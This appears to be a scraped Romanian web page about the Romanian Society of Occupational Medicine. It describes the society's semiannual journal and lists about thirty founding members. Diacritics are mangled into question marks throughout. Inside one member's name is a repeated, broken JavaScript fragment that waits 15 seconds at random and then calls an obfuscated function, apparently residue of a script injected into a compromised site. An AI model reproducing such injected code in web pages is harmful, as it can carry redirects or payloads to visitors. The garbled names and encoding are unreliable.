Publicatii de Specialitate

Societatea romana de medicina a muncii

www.srmedicina-muncii.ro

Societatea Român? de Medicina Muncii editeaz? Revista Societatii Romane de Medicina Muncii, revist? cu apari?ie semestrial?, menit? s? contribuie la valorificarea cercet?rilor de medicina muncii din ?ara noastr? ?i la informarea ?tiin?ific? ?i profesional? a membrilor societ??ii.

Membrii S.R.M.M. primesc gratuit Revista Romana de Medicina Muncii

Membri Fondatori

 • Prof. dr. T. Niculescu
 • Dr. M. Tat
 • Fiz. Eva Irma Csiki
 • Dr. Hilda Herman
 • Dr. O. Ghi?e
 • Dr. Elena Mitran
 • Psih. G. Popescu
 • Dr. V. Pâsl?ru
 • Dr. Rodica Trip?a
 • Dr. Georgeta Ioni??
 • Biol. Natalia Simionescu
 • Dr. Ruxandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andra Artenie
 • Dr. Carmen Dumitru
 • Dr. Dana Iord?chescu
 • Chim. Rodica St?nescu
 • Fiz. F. Presecan
 • Ing. G. Micu
 • Fiz. Corina Fer?str?eru
 • Chim. Adriana Con?ulescu
 • Dr. Nu?i Deliu
 • Dr. Greta Ni??
 • Dr. C. Neagu
 • Biol. Simona Dr?gu?anu
 • Biol. Paraschiva Dragnea
 • Chim. Mihaela Negru
 • Ec. Felicia Stroe
 • Chim. Rodica Vlad
 • Dr. Cornelia Martin
 • Dr. Carmen Gâdiu??
 • Dr. A. Popescu